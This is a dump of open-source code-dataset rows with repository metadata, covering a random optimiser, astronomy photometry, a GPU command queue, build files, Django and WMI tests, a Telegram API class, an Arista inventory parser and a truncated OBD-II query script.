blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
aa65658df4f8fc95e1ef9915be1117aaa44c049c
|
b76384bdcf39605ace17ee51c7902743cb315a00
|
/opt/random_optimiser.py
|
b714186e31d9b24ce2b148f18caa5544bbd1cec0
|
[
"MIT"
] |
permissive
|
RemiLehe/dragonfly
|
c13c54ad106edb4de8f46c8adc44052f926d3685
|
950bee976b8dc5157e84236ce6fd3d4ec5612521
|
refs/heads/master
| 2022-08-15T05:04:57.176391
| 2018-09-08T01:05:33
| 2018-09-08T01:05:33
| 148,205,116
| 1
| 0
|
MIT
| 2018-09-10T19:04:34
| 2018-09-10T19:04:33
| null |
UTF-8
|
Python
| false
| false
| 7,013
|
py
|
"""
Implements some instances of a random optimiser.
-- kandasamy@cs.cmu.edu
"""
# pylint: disable=invalid-name
from argparse import Namespace
import numpy as np
# Local imports
import exd.domains as domains
from exd.exd_utils import get_euclidean_initial_qinfos
from exd.exd_core import mf_exd_args
from opt.blackbox_optimiser import BlackboxOptimiser, blackbox_opt_args, \
CalledMFOptimiserWithSFCaller
from utils.option_handler import load_options
from utils.reporters import get_reporter
from utils.general_utils import map_to_bounds
random_optimiser_args = blackbox_opt_args
euclidean_random_optimiser_args = random_optimiser_args
mf_euclidean_random_optimiser_args = euclidean_random_optimiser_args + mf_exd_args
# Base class for Random Optimisation -----------------------------------------------
class RandomOptimiser(BlackboxOptimiser):
    """ A class which optimises using random evaluations.

        Concrete subclasses supply the query-generation logic; this base class
        wires up options/reporting and stubs out the model hooks (random search
        maintains no surrogate model).
    """
    #pylint: disable=attribute-defined-outside-init
    #pylint: disable=abstract-method

    def __init__(self, func_caller, worker_manager, options=None, reporter=None):
        """ Constructor.

            func_caller: caller for the function being optimised.
            worker_manager: manages the evaluation workers.
            options: Namespace of options; defaults are loaded from
                     random_optimiser_args when None.
            reporter: reporter object or spec understood by get_reporter.
        """
        self.reporter = get_reporter(reporter)
        if options is None:
            options = load_options(random_optimiser_args, reporter=reporter)
        # model=None: random search keeps no surrogate model.
        super(RandomOptimiser, self).__init__(func_caller, worker_manager, model=None,
                                              options=options, reporter=self.reporter)

    def _opt_method_set_up(self):
        """ Any set up specific to optimisation. """
        pass

    def _get_method_str(self):
        """ Returns a string describing the method. """
        return 'rand'

    def _add_data_to_model(self, qinfos):
        """ Adds data to model. No-op: there is no model for random search. """
        pass

    def _child_build_new_model(self):
        """ Builds a new model. No-op: there is no model for random search. """
        pass
# Random optimiser for Euclidean spaces --------------------------------------------
class EuclideanRandomOptimiser(RandomOptimiser):
    """ Optimises over Euclidean domains via uniform random sampling. """

    def is_an_mf_method(self):
        """ This optimiser is single-fidelity. """
        return False

    def _determine_next_query(self):
        """ Samples one uniformly random point within the domain bounds. """
        unit_sample = np.random.random(self.domain.dim)
        return Namespace(point=map_to_bounds(unit_sample, self.domain.bounds))

    def _determine_next_batch_of_queries(self, batch_size):
        """ Samples batch_size independent random queries. """
        return [self._determine_next_query() for _ in range(batch_size)]

    def _get_initial_qinfos(self, num_init_evals):
        """ Returns initial qinfos using the configured initialisation method. """
        return get_euclidean_initial_qinfos(self.options.init_method, num_init_evals,
                                            self.domain.bounds)
# Multi-fidelity Random Optimiser for Euclidean Spaces -------------------------------
class MFEuclideanRandomOptimiser(RandomOptimiser):
    """ A class which optimises in Euclidean spaces using random evaluations and
        multi-fidelity.
    """

    def is_an_mf_method(self):
        """ Returns True since this is a MF method. """
        return True

    def __init__(self, func_caller, worker_manager, call_fidel_to_opt_prob=0.25,
                 *args, **kwargs):
        """ Constructor.

            call_fidel_to_opt_prob is the probability with which we will choose
            fidel_to_opt as the fidel.
        """
        super(MFEuclideanRandomOptimiser, self).__init__(func_caller, worker_manager,
                                                         *args, **kwargs)
        self.call_fidel_to_opt_prob = call_fidel_to_opt_prob
        # A multi-fidelity optimiser requires a multi-fidelity function caller.
        if not func_caller.is_mf():
            raise CalledMFOptimiserWithSFCaller(self, func_caller)

    def _determine_next_query(self):
        """ Determines the next query as a (point, fidelity) pair. """
        def _get_next_fidel():
            """ With probability call_fidel_to_opt_prob returns fidel_to_opt,
                otherwise a uniformly random fidelity. """
            if np.random.random() <= self.call_fidel_to_opt_prob:
                return self.func_caller.fidel_to_opt
            else:
                return np.random.random(self.fidel_space.dim)
        # NOTE(review): unlike EuclideanRandomOptimiser, the point is not mapped
        # to self.domain.bounds -- presumably the MF caller works on a normalised
        # unit-cube domain; confirm before reusing with arbitrary bounds.
        return Namespace(point=np.random.random(self.domain.dim),
                         fidel=_get_next_fidel())

    def _determine_next_batch_of_queries(self, batch_size):
        """ Determines the next batch of queries. """
        return [self._determine_next_query() for _ in range(batch_size)]

    def _get_initial_qinfos(self, num_init_evals):
        """ Returns initial qinfos over both the domain and the fidelity space. """
        return get_euclidean_initial_qinfos(
            self.options.init_method, num_init_evals, self.domain.bounds,
            self.options.fidel_init_method, self.fidel_space.bounds,
            self.func_caller.fidel_to_opt,
            self.options.init_set_to_fidel_to_opt_with_prob)
# APIs for random optimisation ===========================================================
# An API for single fidelity optimisation
def random_optimiser_from_func_caller(func_caller, worker_manager, max_capital, mode,
                                      options=None, reporter='default'):
    """ Creates a EuclideanRandomOptimiser Object and optimises the function. """
    reporter = get_reporter(reporter)
    # Guard clause: only Euclidean domains are supported here.
    if not isinstance(func_caller.domain, domains.EuclideanDomain):
        raise ValueError('Random optimiser not implemented for domain of type %s.'%(
            type(func_caller.domain)))
    optimiser_constructor = EuclideanRandomOptimiser
    dflt_list_of_options = euclidean_random_optimiser_args
    # Load default options if none supplied, then record the optimisation mode.
    if options is None:
        options = load_options(dflt_list_of_options)
    options.mode = mode
    # Build the optimiser and run it.
    optimiser = optimiser_constructor(func_caller, worker_manager, options, reporter)
    return optimiser.optimise(max_capital)
# An API for multi-fidelity optimisation
def mf_random_optimiser_from_func_caller(func_caller, worker_manager, max_capital, mode,
                                         options=None, reporter='default',
                                         *args, **kwargs):
    """ Creates a MF EuclideanRandomOptimiser Object and optimises the function. """
    reporter = get_reporter(reporter)
    # Guard clause: both the domain and the fidelity space must be Euclidean.
    if not (isinstance(func_caller.domain, domains.EuclideanDomain) and
            isinstance(func_caller.fidel_space, domains.EuclideanDomain)):
        raise ValueError(('MF Random optimiser not implemented for (domain, fidel_space) '
                          + 'of types (%s, %s).')%(
                          type(func_caller.domain), type(func_caller.fidel_space)))
    # Load default options if none supplied, then record the optimisation mode.
    if options is None:
        options = load_options(mf_euclidean_random_optimiser_args)
    options.mode = mode
    # Build the optimiser and run it.
    optimiser = MFEuclideanRandomOptimiser(func_caller, worker_manager, options=options,
                                           reporter=reporter, *args, **kwargs)
    return optimiser.optimise(max_capital)
|
[
"kandasamy@cs.cmu.edu"
] |
kandasamy@cs.cmu.edu
|
659da2ed1830691916e79d88dcff073d2175e3ab
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/HundredRun/KUV_00486-2016/sdB_KUV_00486-2016_lc.py
|
b02b47a0574e563b9801476c5c5d0b466ad7622c
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 352
|
py
|
from gPhoton.gAperture import gAperture
def main():
    """ Runs a single gAperture NUV photometry extraction for sdB_KUV_00486-2016. """
    # NOTE(review): the csvfile path contains a space ("...-2016 /sdB_...") and
    # "GPHOTON_OUTPU" looks like a truncated "GPHOTON_OUTPUT" -- confirm both
    # are intentional before relying on this output location.
    gAperture(band="NUV", skypos=[191.49438,-19.999389], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_KUV_00486-2016 /sdB_KUV_00486-2016_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
    main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
bf9a250bb60d5bd8acf6f007ac45e93468b1b0e2
|
2e8d5422aba03edc10154225db2fc39af5e98660
|
/Code/NativePython/GPUCommandList.py
|
2ba28c79817a35025ab9d8e97f51defbb8806e0e
|
[
"MIT"
] |
permissive
|
MYheavyGo/RenderPipeline
|
f500611bef020f45ac63023df206f978be887fc5
|
70002e71c25ba93f05c73d041943d07eb639641c
|
refs/heads/master
| 2021-01-15T14:49:58.756014
| 2016-01-18T15:59:14
| 2016-01-18T15:59:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,638
|
py
|
"""
RenderPipeline
Copyright (c) 2014-2015 tobspr <tobias.springer1@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
class GPUCommandList(object):
    """ Simple FIFO queue of GPU commands. """

    def __init__(self):
        # Pending commands, oldest first.
        self._commands = []

    def add_command(self, cmd):
        """ Enqueues a single command. """
        self._commands.append(cmd)

    def get_num_commands(self):
        """ Returns the number of commands still queued. """
        return len(self._commands)

    def write_commands_to(self, dest, limit=32):
        """ Writes up to `limit` queued commands to `dest` and returns how many
            were written. Each command receives its write slot index. """
        written = 0
        while self._commands and written < limit:
            oldest = self._commands.pop(0)
            oldest.write_to(dest, written)
            written += 1
        return written
|
[
"tobias.springer1@googlemail.com"
] |
tobias.springer1@googlemail.com
|
548d1a106183486e625e18b56894ddc4126ea39c
|
dd80a584130ef1a0333429ba76c1cee0eb40df73
|
/external/chromium_org/ui/keyboard/keyboard.gyp
|
4ea3b09808b9285366865be616e0eb9ecf06483b
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
karunmatharu/Android-4.4-Pay-by-Data
|
466f4e169ede13c5835424c78e8c30ce58f885c1
|
fcb778e92d4aad525ef7a995660580f948d40bc9
|
refs/heads/master
| 2021-03-24T13:33:01.721868
| 2017-02-18T17:48:49
| 2017-02-18T17:48:49
| 81,847,777
| 0
| 2
|
MIT
| 2020-03-09T00:02:12
| 2017-02-13T16:47:00
| null |
UTF-8
|
Python
| false
| false
| 3,341
|
gyp
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
'target_name': 'keyboard_resources',
'type': 'none',
'variables': {
'grit_out_dir': '<(SHARED_INTERMEDIATE_DIR)/ui/keyboard',
},
'actions': [
{
'action_name': 'keyboard_resources',
'variables': {
'grit_grd_file': 'keyboard_resources.grd',
},
'includes': [ '../../build/grit_action.gypi' ],
},
],
'includes': [ '../../build/grit_target.gypi' ],
'copies': [
{
'destination': '<(PRODUCT_DIR)',
'files': [
'<(SHARED_INTERMEDIATE_DIR)/ui/keyboard/keyboard_resources.pak',
],
},
],
},
{
'target_name': 'keyboard',
'type': '<(component)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../../content/content.gyp:content_browser',
'../../ipc/ipc.gyp:ipc',
'../../skia/skia.gyp:skia',
'../../url/url.gyp:url_lib',
'../aura/aura.gyp:aura',
'../compositor/compositor.gyp:compositor',
'../events/events.gyp:events',
'../gfx/gfx.gyp:gfx',
'../ui.gyp:ui',
'keyboard_resources',
],
'defines': [
'KEYBOARD_IMPLEMENTATION',
],
'sources': [
'keyboard.cc',
'keyboard.h',
'keyboard_constants.cc',
'keyboard_constants.h',
'keyboard_controller.cc',
'keyboard_controller.h',
'keyboard_controller_observer.h',
'keyboard_controller_proxy.cc',
'keyboard_controller_proxy.h',
'keyboard_export.h',
'keyboard_switches.cc',
'keyboard_switches.h',
'keyboard_ui_controller.cc',
'keyboard_ui_controller.h',
'keyboard_ui_handler.cc',
'keyboard_ui_handler.h',
'keyboard_util.cc',
'keyboard_util.h',
]
},
{
'target_name': 'keyboard_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/base.gyp:test_support_base',
'../../content/content.gyp:content',
'../../skia/skia.gyp:skia',
'../../testing/gtest.gyp:gtest',
'../../url/url.gyp:url_lib',
'../aura/aura.gyp:aura',
'../aura/aura.gyp:aura_test_support',
'../compositor/compositor.gyp:compositor',
'../gfx/gfx.gyp:gfx',
'../ui.gyp:ui',
'../ui_unittests.gyp:run_ui_unittests',
'keyboard',
],
'sources': [
'keyboard_controller_unittest.cc',
],
'conditions': [
['OS=="linux" and linux_use_tcmalloc==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
],
'link_settings': {
'ldflags': ['-rdynamic'],
},
}],
['OS=="win" and win_use_allocator_shim==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
],
}],
],
},
],
}
|
[
"karun.matharu@gmail.com"
] |
karun.matharu@gmail.com
|
a9d82f50c1dec7b4eb3ff66f299c04a27101aa6f
|
6300fcf67d4fcb5387a9f0f7370a8ffe8f4097d9
|
/AutoParts/Tests/base/mixins.py
|
35bd3b4584f9a55e5747260ca009f68451a98241
|
[] |
no_license
|
Borislav-source/Final-Project
|
e34ac1cbb71e3a32ed490361d3583c2e1e8bfbc9
|
501b258d103c2e1b8947451f4bdf750709d040fd
|
refs/heads/master
| 2023-07-17T15:03:19.390774
| 2021-09-01T14:06:09
| 2021-09-01T14:06:09
| 393,977,540
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 598
|
py
|
from django.utils.timezone import now
from AutoParts.accounts.models import Profile
from AutoParts.vehicle.models import EngineModel, Manufacturer, VehicleModels, Vehicle
class ProfileWithCarMixin:
    """ Test mixin providing a ready-made engine/manufacturer/model/vehicle graph. """
    # NOTE(review): these ORM create() calls execute at class-definition (import)
    # time, not once per test -- setUpTestData/setUp would be the usual home.
    # Confirm this is intentional before reusing the mixin.
    engine = EngineModel.objects.create(engine='1.8t')
    vehicle_manufacturer = Manufacturer.objects.create(name='Mercedes')
    vehicle_model = VehicleModels.objects.create(name='C-class', engine=engine, production_date=now())
    vehicle = Vehicle.objects.create(manufacturer=vehicle_manufacturer, vehicle_type='Car', model=vehicle_model)

    def tearDown(self):
        """ Deletes the shared vehicle after each test. """
        self.vehicle.delete()
|
[
"tsv.borislav@gmail.com"
] |
tsv.borislav@gmail.com
|
c84e38b4c188ec5aeffcefc56fcd15de3ff96624
|
9b1e925d953e29d18451b0bcc0cf2da853d8a29f
|
/testing/test_wmic.py
|
71ef426d6ace68ee24105facbcf4c9bbffc30496
|
[] |
no_license
|
safl/levis
|
a61eeb72e620a924ed185d03988ad5ce5c39654b
|
e6f007f7f74e92c82da16c5645b3f41eb16c77cb
|
refs/heads/master
| 2016-09-06T16:47:43.456935
| 2011-03-07T20:22:19
| 2011-03-07T20:22:19
| 1,360,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,256
|
py
|
#!/usr/bin/env python
import unittest, os
import rpc
class TestKeyParsing(unittest.TestCase):
    """ Smoke test for issuing WQL queries against a remote Windows WMI target.
        (Python 2 syntax: uses a print statement.) """

    def setUp(self):
        # Target host and credentials for the WMI connection.
        # NOTE(review): real-looking credentials are hard-coded here -- consider
        # moving them to environment/config if this file is shared.
        self.wmi_target = {
            "host": "192.168.1.101",
            "domain": "",
            "user": "safl",
            "pass": "bufasbufas"
        }
        # Canned WQL queries keyed by a short mnemonic.
        self.queries = {
            'filesize': "SELECT Name, FileSize FROM CIM_DataFile WHERE Name = 'c:\\\\hej.pst'",
            'exefiles': "SELECT Name, FileSize FROM CIM_DataFile WHERE Extension = 'exe'",
            'service_enum': "SELECT * FROM Win32_Service",
            'service_state': "SELECT Name, State FROM Win32_Service WHERE Name = 'SysmonLog'",
            'disk_enum': "SELECT * FROM Win32_LogicalDisk",
            'disks': "SELECT * FROM Win32_DiskDrive",
            'disk_free': "SELECT Name, DeviceID, FreeSpace FROM Win32_LogicalDisk WHERE DeviceID = 'C:'",
            'cpu_enum': "SELECT * FROM Win32_Processor",
            'cpu_util': "SELECT Name, DeviceID, LoadPercentage FROM Win32_Processor WHERE DeviceID = 'CPU0'",
            'cpu_avg': "SELECT Name, LoadPercentage FROM Win32_Processor",
            'os_enum': "SELECT * FROM Win32_OperatingSystem",
            'tapedrive': "SELECT * FROM Win32_TapeDrive",
            'os_uptime': "SELECT LastBootUpTime FROM Win32_OperatingSystem",
            'os_mem_free_phys': "SELECT FreePhysicalMemory FROM Win32_OperatingSystem",
            'os_mem_free_virt': "SELECT FreeVirtualMemory FROM Win32_OperatingSystem",
            'bios': "SELECT * FROM Win32_Bios",
            'perf_enum': "SELECT * FROM Win32_PerfRawData_PerfOS_System",
            'perf': "SELECT * FROM Win32_PerfFormattedData",
            'eventlog_enum': "SELECT CategoryString, EventCode, EventType, Logfile, SourceName, TimeGenerated, TimeWritten FROM Win32_NTLogEvent WHERE TimeWritten > '20100323193917.000000+060'",
            'eventlog_describe': "SELECT * FROM Win32_NTLogEvent"
        }

    def test_connect_and_query(self):
        # NOTE(review): 'wmic' is never imported in this file (only 'rpc' is),
        # so this line raises NameError as written -- confirm whether 'rpc' or
        # a missing 'import wmic' was intended.
        (out, ret) = wmic.query(self.wmi_target, self.queries['os_enum'])
        print out, ret
|
[
"safl@safl.dk"
] |
safl@safl.dk
|
3bf22289b93db09ad9e3ef68a0b53fb48f6a960e
|
028d788c0fa48a8cb0cc6990a471e8cd46f6ec50
|
/Python-OOP/Exam/project/fish/base_fish.py
|
56973ffd676945dedddedc868c3419b8b1d3ed8c
|
[] |
no_license
|
Sheko1/SoftUni
|
d6b8e79ae545116f4c0e5705ad842f12d77a9c9d
|
a9fbeec13a30231b6a97c2b22bb35257ac1481c0
|
refs/heads/main
| 2023-07-13T15:39:48.826925
| 2021-08-21T12:51:02
| 2021-08-21T12:51:02
| 317,266,200
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,055
|
py
|
from abc import ABC, abstractmethod
class BaseFish(ABC):
    """ Abstract base for fish with validated name, species and price.

        Subclasses must implement eat(); the base implementation (reachable via
        super().eat()) grows the fish by size_to_increase.
    """
    # Amount by which a fish grows on each feeding.
    size_to_increase = 5

    def __init__(self, name: str, species: str, size: int, price: float):
        # Assignments go through the validating property setters below.
        self.name = name
        self.species = species
        self.size = size
        self.price = price

    @property
    def name(self):
        return self.__name

    @name.setter
    def name(self, value):
        if value:
            self.__name = value
        else:
            raise ValueError("Fish name cannot be an empty string.")

    @property
    def species(self):
        return self.__species

    @species.setter
    def species(self, value):
        if value:
            self.__species = value
        else:
            raise ValueError("Fish species cannot be an empty string.")

    @property
    def price(self):
        return self.__price

    @price.setter
    def price(self, value):
        if value <= 0:
            raise ValueError("Price cannot be equal to or below zero.")
        self.__price = value

    @abstractmethod
    def eat(self):
        # Shared growth behaviour for subclasses that call super().eat().
        self.size += self.size_to_increase
|
[
"martinkypar@gmail.com"
] |
martinkypar@gmail.com
|
49c315b88481e4a6d78a623438fcbeda3f56a89d
|
e2e8d2462bcd97fe94b959e8d541f9856b136357
|
/ENV/lib/python3.5/site-packages/pyrogram/api/functions/messages/get_game_high_scores.py
|
dbe17ff41a0be895d46d862131acaeb138dd7eb8
|
[
"MIT"
] |
permissive
|
wasweisic/CryptoPredicted
|
a8babd459ab1da634014830be77615356d0200f7
|
7f660cdc456fb8252b3125028f31fd6f5a3ceea5
|
refs/heads/master
| 2023-04-12T12:34:29.317983
| 2021-02-01T13:07:18
| 2021-02-01T13:07:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,368
|
py
|
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2018 Dan Tès <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.api.core import *
class GetGameHighScores(Object):
    """Attributes:
        ID: ``0xe822649d``
    Args:
        peer: Either :obj:`InputPeerEmpty <pyrogram.api.types.InputPeerEmpty>`, :obj:`InputPeerSelf <pyrogram.api.types.InputPeerSelf>`, :obj:`InputPeerChat <pyrogram.api.types.InputPeerChat>`, :obj:`InputPeerUser <pyrogram.api.types.InputPeerUser>` or :obj:`InputPeerChannel <pyrogram.api.types.InputPeerChannel>`
        id: ``int`` ``32-bit``
        user_id: Either :obj:`InputUserEmpty <pyrogram.api.types.InputUserEmpty>`, :obj:`InputUserSelf <pyrogram.api.types.InputUserSelf>` or :obj:`InputUser <pyrogram.api.types.InputUser>`
    Raises:
        :obj:`Error <pyrogram.Error>`
    Returns:
        :obj:`messages.HighScores <pyrogram.api.types.messages.HighScores>`
    """
    ID = 0xe822649d

    def __init__(self, peer, id: int, user_id):
        self.peer = peer  # InputPeer
        self.id = id  # int
        self.user_id = user_id  # InputUser

    @staticmethod
    def read(b: BytesIO, *args) -> "GetGameHighScores":
        # No flags. Fields are deserialised in wire order: peer, id, user_id
        # (argument evaluation is left-to-right).
        return GetGameHighScores(Object.read(b), Int.read(b), Object.read(b))

    def write(self) -> bytes:
        buffer = BytesIO()
        # Constructor ID first, then the fields in wire order. No flags.
        buffer.write(Int(self.ID, False))
        buffer.write(self.peer.write())
        buffer.write(Int(self.id))
        buffer.write(self.user_id.write())
        return buffer.getvalue()
|
[
"justdoitzlol@gmail.com"
] |
justdoitzlol@gmail.com
|
9fb483bd59a64a4079e937ff1466937a02383c7e
|
48894ae68f0234e263d325470178d67ab313c73e
|
/sa/profiles/Arista/EOS/get_inventory.py
|
b981153e1be44768007d5d21e68c85dc6a016ed1
|
[
"BSD-3-Clause"
] |
permissive
|
DreamerDDL/noc
|
7f949f55bb2c02c15ac2cc46bc62d957aee43a86
|
2ab0ab7718bb7116da2c3953efd466757e11d9ce
|
refs/heads/master
| 2021-05-10T18:22:53.678588
| 2015-06-29T12:28:20
| 2015-06-29T12:28:20
| 118,628,133
| 0
| 0
| null | 2018-01-23T15:19:51
| 2018-01-23T15:19:51
| null |
UTF-8
|
Python
| false
| false
| 3,559
|
py
|
# -*- coding: utf-8 -*-
##----------------------------------------------------------------------
## Arista.EOS.get_inventory
##----------------------------------------------------------------------
## Copyright (C) 2007-2013 The NOC Project
## See LICENSE for details
##----------------------------------------------------------------------
## Python modules
import re
## NOC modules
from noc.sa.script import Script as NOCScript
from noc.sa.interfaces.igetinventory import IGetInventory
from noc.lib.text import parse_table
class Script(NOCScript):
    """ Arista.EOS.get_inventory: parses "show inventory" into object dicts. """
    name = "Arista.EOS.get_inventory"
    cache = True
    implements = [IGetInventory]
    # Section headers look like: "System has <N> <section name>".
    # Raw string avoids the invalid-escape deprecation for \d.
    rx_section = re.compile(r"System has (\d+) (.+?)$", re.MULTILINE)

    def execute(self):
        """ Runs "show inventory" and dispatches each section to its parser. """
        objects = []
        v = self.cli("show inventory")
        # split() yields [chassis_text, count, name, body, count, name, body, ...]
        sections = self.rx_section.split(v)
        objects += self.parse_chassis(sections.pop(0))
        while sections:
            # Renamed from 'type' to avoid shadowing the builtin.
            cnt, section_name, data = sections[:3]
            sections = sections[3:]
            t = section_name.lower()
            if t.startswith("power supply"):
                objects += self.parse_psu(data)
            elif t.startswith("fan"):
                objects += self.parse_fan(data)
            elif t.startswith("transceiver"):
                objects += self.parse_transceiver(data)
        return objects

    @classmethod
    def parse_chassis(cls, data):
        """ Parses the chassis section: one table of part numbers/descriptions
            followed by a table of revisions and serials in the same order. """
        objects = []
        parts = data.split("\n\n")
        # Chassis section: drop the header line, parse the table body.
        _, ctable = parts[0].split("\n", 1)
        n = 0
        for part_no, description in parse_table(ctable):
            objects += [{
                "type": "CHASSIS",
                "number": str(n),
                "vendor": "ARISTA",
                "serial": None,
                "description": description,
                "part_no": part_no,
                "revision": None,
                "builtin": False
            }]
            n += 1
        # Serial/revision section: rows align positionally with the table above.
        # NOTE(review): assumes both tables have equal row counts; a mismatch
        # would raise IndexError.
        n = 0
        for rev, serial, _ in parse_table(parts[1]):
            objects[n]["revision"] = rev
            objects[n]["serial"] = serial
            n += 1
        return objects

    @classmethod
    def parse_psu(cls, data):
        """ Parses the power-supply table into PWR objects. """
        objects = []
        for slot, part_no, serial in parse_table(data.strip()):
            objects += [{
                "type": "PWR",
                "number": slot,
                "vendor": "ARISTA",
                "serial": serial,
                "part_no": part_no,
                "builtin": False
            }]
        return objects

    @classmethod
    def parse_fan(cls, data):
        """ Parses the fan table into FAN objects (fan count column ignored). """
        objects = []
        for slot, nfans, part_no, serial in parse_table(data.strip()):
            objects += [{
                "type": "FAN",
                "number": slot,
                "vendor": "ARISTA",
                "serial": serial,
                "part_no": part_no,
                "builtin": False
            }]
        return objects

    @classmethod
    def parse_transceiver(cls, data):
        """ Parses the transceiver table into XCVR objects, skipping empty ports
            and normalising the Arista vendor name. """
        objects = []
        for port, vendor, part_no, serial, rev in parse_table(data.strip()):
            vendor = vendor.upper()
            if vendor == "NOT PRESENT":
                continue
            if vendor == "ARISTA NETWORKS":
                vendor = "ARISTA"
            objects += [{
                "type": "XCVR",
                "number": port,
                "vendor": vendor,
                "serial": serial,
                "part_no": part_no,
                "builtin": False
            }]
        return objects
|
[
"dv@nocproject.org"
] |
dv@nocproject.org
|
46b93892928e8b45940441867657548a521a2644
|
364020e5cb0f057f4e63b8e0c43a03c565bb249d
|
/panda/examples/query_vin_and_stats.py
|
f3d6c198aff9f1485743a904d083deab4cee5fb4
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
Gernby/openpilot
|
fb7c9e607be438334aaf48e338de7f07343a7873
|
d8da18ed546637a8d6a00d2b4c9dfafb90d2a4dd
|
refs/heads/devel
| 2020-04-05T02:04:56.217699
| 2019-07-01T21:15:34
| 2019-07-01T21:15:34
| 156,462,811
| 38
| 75
|
MIT
| 2020-04-25T21:01:31
| 2018-11-06T23:34:08
|
C++
|
UTF-8
|
Python
| false
| false
| 1,723
|
py
|
#!/usr/bin/env python
import time
import struct
from panda import Panda
from hexdump import hexdump
from panda.python.isotp import isotp_send, isotp_recv
# 0x7e0 = Toyota
# 0x18DB33F1 for Honda?
def get_current_data_for_pid(pid):
    """ Sends an OBD-II service 01 (show current data) request for `pid` on the
        module-level `panda` and returns the raw ISO-TP reply bytes. """
    # 01 xx = Show current data
    isotp_send(panda, "\x01"+chr(pid), 0x7e0)
    return isotp_recv(panda, 0x7e8)
def get_supported_pids():
    """ Walks the supported-PID bitmask queries (PID 0x00, 0x20, 0x40, ...) and
        returns the list of supported PID numbers. """
    ret = []
    pid = 0
    while 1:
        # Reply payload (after the 2-byte service/PID echo) is a 32-bit
        # big-endian bitmask covering PIDs pid+1 .. pid+0x20, MSB first.
        supported = struct.unpack(">I", get_current_data_for_pid(pid)[2:])[0]
        for i in range(1+pid, 0x21+pid):
            if supported & 0x80000000:
                ret.append(i)
            supported <<= 1
        pid += 0x20
        # The next bitmask PID (0x20, 0x40, ...) is itself reported as supported
        # when more pages exist; stop when it is absent.
        if pid not in ret:
            break
    return ret
if __name__ == "__main__":
    # Python 2 script: queries VIN, DTCs and live stats over OBD-II via a panda.
